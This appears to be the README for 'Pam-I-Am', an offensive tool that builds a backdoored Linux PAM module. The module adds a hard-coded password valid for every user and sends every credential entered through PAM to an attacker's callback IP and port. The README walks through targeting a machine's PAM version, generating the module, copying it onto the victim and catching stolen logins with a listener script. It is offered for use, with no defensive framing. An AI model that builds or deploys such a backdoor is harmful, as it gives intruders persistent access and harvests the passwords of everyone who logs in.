# Pam-I-Am         
## Info / How to
This tool will create a backdoored PAM module which does the following:
- Creates a hard-coded passowrd valid for all users
- Exfiltrates all valid credentials supplied to PAM to specified host/port, all data is encrypted in transit

Given the nature of this PAM module, you should be able to use the hard-coded credential and sniff creds for nearly all auth on Linux including SSH, su, and sudo. 

This module will not work with SELinux enabled, make sure to check if its enabled as replacing this module will break auth if so. 

To use this tool you must take the following steps:
1. Ensure you have build tools (and flex)  installed on the system you are building the PAM module.
    - Tools can be installed using "apt-get install build-essential libfl-dev" on Debian/Ubuntu.
2. Detect the PAM version on the target machine.
    - This can be done with "dpkg -l | grep pam-modules" on Debian/Ubuntu, or "rpm -qa | grep pam" on RHEL/CentOS
    - You only need base version (for example: 1.3.0 or 1.1.8) nothing after the dash.
3. Run pamIam.py as shown below in the "Usage" section.

4. Copy the newly created backdoored pam_unix.so file to your target machine.

5. Take advantage of your newly installed backdoor
    - Use server.py to catch the exfiltrated logons as shown in the "Usage" section below.
    - Use the hardcoded credential to SSH into the target machine as any user or to su / sudo as any user.

##  pamIam.py usage
- PamVersion = PAM version on target
- BackdooredPass = Value for static backdoor password
- CallBackIP = IP to send logged credentials to
- CallBackPort = Port to send logged credentials to
- TransitKey = Key to encrypt credentials in transit

To generate the backdoored pam_unix.so,  run:
```
pamIam.py VictimPAMVersion y0ur_B4ckd00r_p4ss CallbackIP CallbackPort TransitKey
```
##  server.py usage
To sniff the encrypted credentials over TCP run the following on your listener/ CallBackIP:
```
server.py BindPort TransitKey
```

## Credit
Concept heavily inspired / based on prior work by zephrax: https://github.com/zephrax/linux-pam-backdoor

## TODO
- Add option for DNS exfil vs straight TCP
- Use better encryption (currently just XOR with a repeating key)
